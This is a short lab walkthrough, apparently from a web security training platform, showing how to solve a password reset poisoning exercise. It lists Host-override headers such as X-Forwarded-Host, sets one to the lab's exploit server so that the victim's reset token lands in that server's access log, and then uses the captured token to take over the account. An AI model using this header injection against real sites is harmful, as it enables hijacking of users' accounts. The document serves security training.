Password Reset Poisoning via Middleware

Lab#

Password reset poisoning via middleware · Practitioner

Solution#

Given#

This lab is vulnerable to password reset poisoning. The user `carlos` will carelessly click on any links in emails that he receives. To solve the lab, log in to Carlos's account. You can log in to your own account using the following credentials: `wiener:peter`. Any emails sent to this account can be read via the email client on the exploit server.

Analyzing the task#

Judging by the name, similar to the previous lab, only we need to use the technique of X-* headers to override the Host header. The first one to try is usually X-Forwarded-Host, and there's also:

X-Host
X-Forwarded-Server
X-HTTP-Host-Override
Forwarded

Recon#

Let's look at the password reset function. We send a reset request for our own user. Let's try right away to override the Host header with our exploit server's address. No response at all, just Stream closed.

OK, let's try X-Forwarded-Host. We add to the headers:

X-Forwarded-Host: exploit-0a20001104ed604d802011ff017700f1.exploit-server.net

Works! Now in the request body we change the username to carlos. We go to the access logs and see:

/forgot-password?temp-forgot-password-token=j4by8s8k70bbyzg3pj5x6l4d9ymzkl0f

We follow the link, change the password. We log in.

Lab solved!